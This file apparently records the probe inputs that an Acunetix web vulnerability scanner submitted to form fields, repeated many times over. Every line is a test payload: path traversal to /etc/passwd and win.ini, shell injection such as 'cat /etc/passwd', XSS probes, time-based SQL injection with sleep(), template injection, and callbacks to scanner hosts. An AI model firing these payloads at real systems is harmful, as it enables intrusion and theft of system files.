Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1&n914829=v990598

1&lt

)

1

1

-1)

1

'|'ld

1some_inexistent_file_with_long_name%00.jpg

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

!(()&&!|*|*|

\xf6<img acu onmouseover=prompt(989923) //\xf6>

1

-1))

1

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

'"()

1<input autofocus onfocus=prompt(952102)>

HCz0b6KC'

1

1

'

1

testasp.vulnweb.com

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

lTSJb6Yt')

<a href='http://www.acunetix.com'>website security</a>

"

1

1

1

1

1

'

/etc/passwd

wenkYkF4'))

[url=http://www.acunetix.com]website security[/url]

${@print(md5(acunetix_wvs_security_test))}

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

1

1

1_jRa5M <ScRiPt >prompt(926424)</ScRiPt>

-1

1

${@print(md5(acunetix_wvs_security_test))}\

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

||cat /etc/passwd

1

1

-1)

acunetix_wvs_invalid_filename

1

-1))

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://hitBfnfIS0J8p.bxss.me/

1

&dir

1

1

comments

wFywzrKe'

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

'&dir&'

http://www.acunetix.tst

comments

Sn3AJkEO')

1

1

1

1

'"

file:///etc/passwd

vNHihzIW'))

comments/.

"&dir&"

1

1

1

1'"()&%<ScRiPt >prompt(905295)</ScRiPt>

<!--

/\../\../\../\../\../\../\../etc/passwd

1

1

1

|dir

'"()&%<ScRiPt >prompt(953353)</ScRiPt>

1

1

1

WEB-INF/web.xml

1_902472

1

1

WEB-INF\web.xml

'|dir

1

1

1

../../../../../../../../../../windows/win.ini

1

"|dir

1

acu3263\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3263

../../../../../../../../../../boot.ini

1

1

acux7761\xc0\xbez1\xc0\xbcz2a\x90bcxuca7761

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<ScRiPt >prompt(929142)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<script>prompt(974726)</script>

1

1

1

1

1<ScRiPt >prompt(986678)</ScRiPt>

1

................windowswin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?948190></ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(934562)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<video><source onerror="javascript:prompt(915095)">

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(908244)"></g></svg>

1

response.write(9981903*9641237)

1

'+response.write(9981903*9641237)+'

1<div style=width:expression(prompt(914848))>

1

1

&cat /etc/passwd&

WEB-INF/web.xml

1

1<iframe src='data:text/html

"+response.write(9981903*9641237)+"

WEB-INF\web.xml

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1<body onload=prompt(965428)>

1

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

../../../../../../../../../../etc/passwd

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(998438)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

1

1

if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/

1

1

1

1<img src=xyz OnErRor=prompt(968880)>

../../../../../../../../../../etc/passwd.jpg

1

1

${99426+99963}

`cat /etc/passwd`

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img/src=">" onerror=alert(938977)>

1

1

1

1

1&n950873=v982758

1some_inexistent_file_with_long_name%00.jpg

|cat /etc/passwd#

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1<ScRiPt%20>prompt(991528)</sCripT>

)

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1

'|'ld

1&lt

!(()&&!|*|*|

1

1

'"()

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1)

testasp.vulnweb.com

\xf6<img acu onmouseover=prompt(976201) //\xf6>

"|"ld

1

1

^(#$!@#$)(()))******

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

-1))

'

1

1<input autofocus onfocus=prompt(978223)>

1

1

1

1

/etc/passwd

llgGwkzy'

1

1

"

<a href='http://www.acunetix.com'>website security</a>

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

lC86jMVp')

'

1

1

1

${@print(md5(acunetix_wvs_security_test))}

[url=http://www.acunetix.com]website security[/url]

1

1

1

DmVWSjdW'))

http://hitUTfTBRATp8.bxss.me/

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

"

1

1_yhBBH <ScRiPt >prompt(968258)</ScRiPt>

1

1

acunetix_wvs_invalid_filename

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

||cat /etc/passwd

comments

1

1

1

1

http://www.acunetix.tst

1

1

comments

1

&dir

'"

1

1

1'"()&%<ScRiPt >prompt(931236)</ScRiPt>

comments/.

-1

1

file:///etc/passwd

<!--

'&dir&'

1

1

-1)

1

1

"&dir&"

/\../\../\../\../\../\../\../etc/passwd

1

'"()&%<ScRiPt >prompt(975276)</ScRiPt>

-1))

WEB-INF/web.xml

1

1

1

CeAtTnsn'

1_973191

|dir

1

XonACK2u')

WEB-INF\web.xml

1

'|dir

1

0c0lyjmj'))

"|dir

../../../../../../../../../../windows/win.ini

1

acu6314\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6314

1

1

1

acux9672\xc0\xbez1\xc0\xbcz2a\x90bcxuca9672

../../../../../../../../../../boot.ini

1

1

1

1<ScRiPt >prompt(926778)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<script>prompt(999048)</script>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

................windowswin.ini

1<ScRiPt >prompt(993861)</ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?928758></ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(985287)</ScRiPt>

response.write(9303944*9775268)

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<video><source onerror="javascript:prompt(988017)">

1

1

'+response.write(9303944*9775268)+'

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

&cat /etc/passwd&

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(952965)"></g></svg>

1

1

1

"+response.write(9303944*9775268)+"

1<div style=width:expression(prompt(972631))>

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

"&cat /etc/passwd&"

WEB-INF/web.xml

1<iframe src='data:text/html

1

../../../../../../../../../../etc/passwd

1

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1<body onload=prompt(973461)>

WEB-INF\web.xml

cat /etc/passwd

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

`cat /etc/passwd`

${99132+100065}

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(981952)>

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

1

../../../../../../../../../../etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

|cat /etc/passwd#

1<img src=xyz OnErRor=prompt(968574)>

1

1&n904301=v916871

-1

1

1some_inexistent_file_with_long_name%00.jpg

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<img/src=">" onerror=alert(910585)>

)

'|'ld

-1)

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1<ScRiPt%20>prompt(954004)</sCripT>

1

!(()&&!|*|*|

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

"|"ld

testasp.vulnweb.com

1&lt

1

1

^(#$!@#$)(()))******

YTO09Tt9'

/../..//../..//../..//../..//../..//etc/passwd.jpg

7NjGZEJ3')

'"()

1

'

\xf6<img acu onmouseover=prompt(958164) //\xf6>

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

Y9voIS5Z'))

1

1

"

1

1<input autofocus onfocus=prompt(933164)>

'

1

1

/etc/passwd

1

-1

1

1

${@print(md5(acunetix_wvs_security_test))}

"

<a href='http://www.acunetix.com'>website security</a>

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1)

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

||cat /etc/passwd

-1))

1

[url=http://www.acunetix.com]website security[/url]

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

http://hit6h9lEnDvWk.bxss.me/

RmYXlaWw'

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

&dir

1_0HwHU <ScRiPt >prompt(902276)</ScRiPt>

acunetix_wvs_invalid_filename

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

AbdDwQau')

1

1

comments

'&dir&'

1

http://www.acunetix.tst

1

'"

YyvNPNhD'))

1'"()&%<ScRiPt >prompt(960749)</ScRiPt>

1

comments

1

"&dir&"

file:///etc/passwd

1

1

1

'"()&%<ScRiPt >prompt(949723)</ScRiPt>

1

comments/.

|dir

1

1

/\../\../\../\../\../\../\../etc/passwd

<!--

1

1

1_905487

1

1

'|dir

1

WEB-INF/web.xml

1

"|dir

1

1

WEB-INF\web.xml

1

1

1

acu1092\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1092

1

1

../../../../../../../../../../windows/win.ini

1

1

acux10415\xc0\xbez1\xc0\xbcz2a\x90bcxuca10415

1

../../../../../../../../../../boot.ini

1

1

1

1<ScRiPt >prompt(902885)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<script>prompt(982830)</script>

................windowswin.ini

1

1

1

1<ScRiPt >prompt(936324)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?976446></ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(942097)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(916748)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(903058)"></g></svg>

1

1

response.write(9107535*9582648)

1<div style=width:expression(prompt(967298))>

1

WEB-INF/web.xml

1

1

'+response.write(9107535*9582648)+'

&cat /etc/passwd&

1<iframe src='data:text/html

1

WEB-INF\web.xml

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

"+response.write(9107535*9582648)+"

1

1

1<body onload=prompt(923462)>

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(975990)>

1

if(now()=sysdate(),sleep(3.14),0)/*'XOR(if(now()=sysdate(),sleep(3.14),0))OR'"XOR(if(now()=sysdate(),sleep(3.14),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd.jpg

1

cat /etc/passwd

1

1

1

1<img src=xyz OnErRor=prompt(971345)>

(select(0)from(select(sleep(3.14)))v)/*'+(select(0)from(select(sleep(3.14)))v)+'"+(select(0)from(select(sleep(3.14)))v)+"*/

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

`cat /etc/passwd`

-1

1<img/src=">" onerror=alert(906867)>

1

1

1

${100192+100373}

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1)

1<ScRiPt%20>prompt(942603)</sCripT>

1

|cat /etc/passwd#

1

1

1

1

-1))

1&lt

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n907597=v909068

'|'ld

)

\xf6<img acu onmouseover=prompt(952149) //\xf6>

1

dY1UL0Dx'

1

'"()

1some_inexistent_file_with_long_name%00.jpg

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

"|"ld

1<input autofocus onfocus=prompt(977947)>

1

1

dbTdY0EB')

1

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/etc/passwd

<a href='http://www.acunetix.com'>website security</a>

1

1

r7LWkgaL'))

1

1

testasp.vulnweb.com

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1

[url=http://www.acunetix.com]website security[/url]

'

1

1

1

1_2Y1Zz <ScRiPt >prompt(920898)</ScRiPt>

1

1

"

-1)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

acunetix_wvs_invalid_filename

1

http://hitiDH8Gv1ANV.bxss.me/

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

${@print(md5(acunetix_wvs_security_test))}

||cat /etc/passwd

-1))

comments

1

1

1

1

1

&dir

${@print(md5(acunetix_wvs_security_test))}\

1

GuQ6UGPw'

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

http://www.acunetix.tst

wcIq8NfI')

'&dir&'

'"

1

1

file:///etc/passwd

1

comments/.

1'"()&%<ScRiPt >prompt(935910)</ScRiPt>

<!--

yI1khmhF'))

1

1

"&dir&"

'"()&%<ScRiPt >prompt(934015)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

1_922252

1

|dir

1

WEB-INF/web.xml

1

1

'|dir

1

WEB-INF\web.xml

1

"|dir

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

acu4728\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4728

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

acux9329\xc0\xbez1\xc0\xbcz2a\x90bcxuca9329

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(967991)</ScRiPt>

1

1

1

................windowswin.ini

1<script>prompt(944980)</script>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(966090)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?951657></ScRiPt>

1

1

1<ScRiPt >prompt(965419)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1<video><source onerror="javascript:prompt(933689)">

1

1

response.write(9244526*9133029)

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(983171)"></g></svg>

1

1

WEB-INF/web.xml

1

&cat /etc/passwd&

'+response.write(9244526*9133029)+'

1<div style=width:expression(prompt(936632))>

1

WEB-INF\web.xml

1

1

"+response.write(9244526*9133029)+"

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

1

1

1

1

1<body onload=prompt(910654)>

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(986810)>

1

cat /etc/passwd

1

${99627+99594}

1

1

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1<img src=xyz OnErRor=prompt(999061)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

`cat /etc/passwd`

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

-1

1<img/src=">" onerror=alert(915478)>

../../../../../../../../../../etc/passwd.jpg

|cat /etc/passwd#

1

1&n939715=v917762

)

1

1some_inexistent_file_with_long_name%00.jpg

-1)

1

1<ScRiPt%20>prompt(905408)</sCripT>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1))

!(()&&!|*|*|

'|'ld

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

'"()

1&lt

^(#$!@#$)(()))******

xYGDaDPq'

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"|"ld

testasp.vulnweb.com

1

\xf6<img acu onmouseover=prompt(947347) //\xf6>

1

1

21D3ucaP')

1

'

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

wiPLNern'))

1<input autofocus onfocus=prompt(987864)>

1

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'

-1

<a href='http://www.acunetix.com'>website security</a>

1

1

1

${@print(md5(acunetix_wvs_security_test))}

1

1

"

/etc/passwd

[url=http://www.acunetix.com]website security[/url]

-1)

http://hitDxFMeOz9FE.bxss.me/

acunetix_wvs_invalid_filename

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

1_g8ZTF <ScRiPt >prompt(924771)</ScRiPt>

||cat /etc/passwd

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1))

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

3aDIwzKq'

comments

&dir

1

'"

http://www.acunetix.tst

1

RbXJ3Tim')

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

comments/.

elIFZdUz'))

'&dir&'

1'"()&%<ScRiPt >prompt(920789)</ScRiPt>

<!--

1

1

1

1

1

1

'"()&%<ScRiPt >prompt(929308)</ScRiPt>

"&dir&"

1

1

|dir

1

1_907367

file:///etc/passwd

1

1

'|dir

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

"|dir

WEB-INF/web.xml

1

acu3482\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3482

1

1

WEB-INF\web.xml

1

1

1

acux5396\xc0\xbez1\xc0\xbcz2a\x90bcxuca5396

1

../../../../../../../../../../windows/win.ini

1

1

1

1<ScRiPt >prompt(975658)</ScRiPt>

../../../../../../../../../../boot.ini

1

1

1

1<script>prompt(918647)</script>

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(988370)</ScRiPt>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?960795></ScRiPt>

1

1

................windowswin.ini

1

1<ScRiPt >prompt(990388)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<video><source onerror="javascript:prompt(971534)">

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

response.write(9924701*9084843)

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(972127)"></g></svg>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<div style=width:expression(prompt(940610))>

'+response.write(9924701*9084843)+'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1<iframe src='data:text/html

1

1

"+response.write(9924701*9084843)+"

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF/web.xml

1

1<body onload=prompt(963206)>

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(973676)>

1

../../../../../../../../../../etc/passwd

WEB-INF\web.xml

cat /etc/passwd

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1<img src=xyz OnErRor=prompt(928378)>

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

`cat /etc/passwd`

1

1

1<img/src=">" onerror=alert(932300)>

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

${99968+100393}

1

../../../../../../../../../../etc/passwd.jpg

|cat /etc/passwd#

1<ScRiPt%20>prompt(937570)</sCripT>

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1&n949619=v958868

1

1&lt

)

'|'ld

1

1some_inexistent_file_with_long_name%00.jpg

-1)

'"()

!(()&&!|*|*|

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

\xf6<img acu onmouseover=prompt(945352) //\xf6>

1

1

"|"ld

-1))

1

^(#$!@#$)(()))******

testasp.vulnweb.com

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<input autofocus onfocus=prompt(930291)>

AAtYm0e2'

1

1

1

1

'

<a href='http://www.acunetix.com'>website security</a>

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

OvHZZpae')

'

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

"

[url=http://www.acunetix.com]website security[/url]

1

ay5PBIIz'))

/etc/passwd

1

1

1

1

1_1Zm1N <ScRiPt >prompt(969007)</ScRiPt>

1

${@print(md5(acunetix_wvs_security_test))}

"

-1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

http://hitCNACr7afH5.bxss.me/

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

${@print(md5(acunetix_wvs_security_test))}\

1

-1)

1

||cat /etc/passwd

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

acunetix_wvs_invalid_filename

1

1

-1))

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

&dir

1

1

http://www.acunetix.tst

comments

1

'"

gD4sw5Py'

'&dir&'

comments

1

1

<!--

M2lhZJYH')

"&dir&"

1

1'"()&%<ScRiPt >prompt(995731)</ScRiPt>

1

comments/.

1

file:///etc/passwd

G7tI2gcU'))

1

|dir

1

1

1

'"()&%<ScRiPt >prompt(949525)</ScRiPt>

'|dir

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1_982408

"|dir

1

1

WEB-INF/web.xml

1

1

1

1

1

WEB-INF\web.xml

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

acu9278\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9278

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acux9463\xc0\xbez1\xc0\xbcz2a\x90bcxuca9463

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(902721)</ScRiPt>

1

1

1

1

................windowswin.ini

1

1<script>prompt(962693)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(914567)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?922514></ScRiPt>

response.write(9211978*9002503)

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt >prompt(963753)</ScRiPt>

&cat /etc/passwd&

'+response.write(9211978*9002503)+'

1

1<video><source onerror="javascript:prompt(944394)">

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(920001)"></g></svg>

'&cat /etc/passwd&'

"+response.write(9211978*9002503)+"

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF/web.xml

1

../../../../../../../../../../etc/passwd

"&cat /etc/passwd&"

1

1<div style=width:expression(prompt(908952))>

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF\web.xml

